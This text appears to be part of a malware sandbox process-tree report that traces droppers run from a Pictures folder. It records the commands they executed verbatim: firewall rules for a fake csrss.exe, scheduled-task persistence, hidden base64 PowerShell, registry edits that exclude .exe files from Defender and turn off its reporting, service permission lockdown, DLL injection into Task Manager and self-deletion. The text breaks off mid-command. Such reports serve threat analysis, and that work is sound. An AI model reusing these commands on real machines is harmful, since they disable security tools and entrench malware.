C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3964 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:4864
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:3708
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:836
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:5656
-
-
-
-
C:\Users\Admin\Pictures\zFFFw4OHExPBcLGvnue2mRJZ.exe"C:\Users\Admin\Pictures\zFFFw4OHExPBcLGvnue2mRJZ.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1124 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1832
-
-
C:\Users\Admin\Pictures\zFFFw4OHExPBcLGvnue2mRJZ.exe"C:\Users\Admin\Pictures\zFFFw4OHExPBcLGvnue2mRJZ.exe"4⤵
- Executes dropped EXE
PID:6032 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 2685⤵
- Program crash
PID:5280
-
-
-
-
C:\Users\Admin\Pictures\xCnC3kRGjYzKzgztZzTB60s2.exe"C:\Users\Admin\Pictures\xCnC3kRGjYzKzgztZzTB60s2.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3308 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
C:\Users\Admin\Pictures\xCnC3kRGjYzKzgztZzTB60s2.exe"C:\Users\Admin\Pictures\xCnC3kRGjYzKzgztZzTB60s2.exe"4⤵
- Executes dropped EXE
PID:6016 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 2645⤵
- Program crash
PID:5324
-
-
-
-
C:\Users\Admin\Pictures\L7msUYWEb0w2cAnBCZdJMuLo.exe"C:\Users\Admin\Pictures\L7msUYWEb0w2cAnBCZdJMuLo.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3664 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:216
-
-
C:\Users\Admin\Pictures\L7msUYWEb0w2cAnBCZdJMuLo.exe"C:\Users\Admin\Pictures\L7msUYWEb0w2cAnBCZdJMuLo.exe"4⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:6040 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5928
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:3860
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3664
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:5864
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:3264
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:5456
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵PID:6056
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:5772
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:2848
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:4024
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:4804
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:3372
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵PID:5520
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:5872
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:836
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵PID:2076
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:1288
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
PID:4860
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\wiv9T1pqAf4f2oHhfWycBzc5.exe"C:\Users\Admin\Pictures\wiv9T1pqAf4f2oHhfWycBzc5.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Users\Admin\AppData\Local\Temp\wfplwfs.exeC:\Users\Admin\AppData\Local\Temp\wfplwfs.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe5⤵PID:4120
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe5⤵
- Suspicious use of SetWindowsHookEx
PID:5076 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 17846⤵
- Program crash
PID:1488
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe5⤵
- Suspicious use of SetWindowsHookEx
PID:5004 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 17806⤵
- Program crash
PID:5868
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe5⤵
- Suspicious use of SetWindowsHookEx
PID:2084 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 17886⤵
- Program crash
PID:5672
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe5⤵
- Suspicious use of SetWindowsHookEx
PID:5220 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 17606⤵
- Program crash
PID:5492
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe5⤵
- Suspicious use of SetWindowsHookEx
PID:4452 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 17446⤵
- Program crash
PID:5212
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe5⤵PID:3564
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3564 -s 17806⤵
- Program crash
PID:3528
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe5⤵PID:3708
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 17606⤵
- Program crash
PID:3296
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe5⤵PID:5148
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 17766⤵
- Program crash
PID:3324
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe5⤵PID:5900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 17846⤵
- Program crash
PID:4392
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\Pictures\wiv9T1pqAf4f2oHhfWycBzc5.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 35⤵
- Runs ping.exe
PID:2848
-
-
-
-
C:\Users\Admin\Pictures\P3JBDfWsxH7gfXrVpC5Da95h.exe"C:\Users\Admin\Pictures\P3JBDfWsxH7gfXrVpC5Da95h.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2604 -
C:\Users\Admin\AppData\Local\Temp\syncUpd.exeC:\Users\Admin\AppData\Local\Temp\syncUpd.exe4⤵
- Executes dropped EXE
PID:2368 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2368 -s 10165⤵
- Program crash
PID:4532
-
-
-
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5216
-
-
-
C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe"C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:2472 -
C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exeC:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.29 --initial-client-data=0x2e8,0x2ec,0x2f0,0x2c4,0x2f4,0x6d8e21f8,0x6d8e2204,0x6d8e22104⤵
- Executes dropped EXE
- Loads dropped DLL
PID:212
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\JVj1qEtdxsUSRfq6lUYWP1us.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\JVj1qEtdxsUSRfq6lUYWP1us.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5256
-
-
C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe"C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2472 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240319025827" --session-guid=f8168227-ec23-42ba-bff5-53ea2b045c13 --server-tracking-blob=ZTIxMWE3YjdhYzEwYzZiYWIwMzFlNzE0ZDliNjMwOWE3OTczMTQ4NGYxZWQwMWVjNWE5MTc3NWYyMzZmNzI2Mjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxMDgxNzA2Ny41OTc0IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI2ZmZjODdmZC1mODczLTQyNzEtYWQ5YS1mMTc1MTM4N2ExYjUifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=AC050000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:5440 -
C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exeC:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.29 --initial-client-data=0x2e0,0x2e4,0x2f4,0x2bc,0x2f8,0x6a6721f8,0x6a672204,0x6a6722105⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5544
-
-
-
-
C:\Users\Admin\Pictures\vedpmmRXAXSZuq7UqKOIe4r1.exe"C:\Users\Admin\Pictures\vedpmmRXAXSZuq7UqKOIe4r1.exe"3⤵
- Executes dropped EXE
PID:5336 -
C:\Users\Admin\AppData\Local\Temp\7zS7FBA.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
PID:4484 -
C:\Users\Admin\AppData\Local\Temp\7zS8855.tmp\Install.exe.\Install.exe /DDfBFdidvhHni "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:5408 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:4988
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:5664
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:2116
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:2480
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:5692
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:5632
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:4392
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:3044
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gGvhKmIWC" /SC once /ST 00:42:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:5176 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:5004
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gGvhKmIWC"6⤵PID:5752
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gGvhKmIWC"6⤵PID:5352
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bkigDFRrkKahyaAEgB" /SC once /ST 03:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\IYOJNCZhaGnhdyWSM\heEFQcHFnsMnkaH\TYtOlOG.exe\" Gv /ntsite_idfxK 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2028
-
-
-
-
-
C:\Users\Admin\Pictures\ePj0Q3IAwol0xi3TP0p4YL3U.exe"C:\Users\Admin\Pictures\ePj0Q3IAwol0xi3TP0p4YL3U.exe"3⤵
- Executes dropped EXE
PID:3504 -
C:\Users\Admin\AppData\Local\Temp\7zS896F.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
PID:6100 -
C:\Users\Admin\AppData\Local\Temp\7zS9258.tmp\Install.exe.\Install.exe /DDfBFdidvhHni "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:1304 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:828
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:3184
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:4120
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:1124
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:2760
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:6056
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:3664
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:5136
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gEdoOJdNL" /SC once /ST 00:31:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:5380
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gEdoOJdNL"6⤵PID:4452
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gEdoOJdNL"6⤵PID:5872
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bkigDFRrkKahyaAEgB" /SC once /ST 03:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\IYOJNCZhaGnhdyWSM\heEFQcHFnsMnkaH\LkufTTH.exe\" Gv /DUsite_idJlz 385118 /S" /V1 /F6⤵
- Creates scheduled task(s)
PID:5732 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:3196
-
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3376 -ip 33761⤵PID:1640
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5076 -ip 50761⤵PID:4840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5216 -ip 52161⤵PID:5832
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6032 -ip 60321⤵PID:6100
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6016 -ip 60161⤵PID:6112
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5004 -ip 50041⤵PID:2312
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2084 -ip 20841⤵PID:5228
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:5840
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:4640
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2484
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5220 -ip 52201⤵PID:3232
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4724 -ip 47241⤵PID:5908
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2368 -ip 23681⤵PID:2760
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4452 -ip 44521⤵PID:5144
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 3564 -ip 35641⤵PID:5740
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3708 -ip 37081⤵PID:5608
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵PID:6140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:5656
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1268
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5048
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5148 -ip 51481⤵PID:5012
-
C:\Users\Admin\AppData\Local\Temp\IYOJNCZhaGnhdyWSM\heEFQcHFnsMnkaH\LkufTTH.exeC:\Users\Admin\AppData\Local\Temp\IYOJNCZhaGnhdyWSM\heEFQcHFnsMnkaH\LkufTTH.exe Gv /DUsite_idJlz 385118 /S1⤵PID:5324
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD 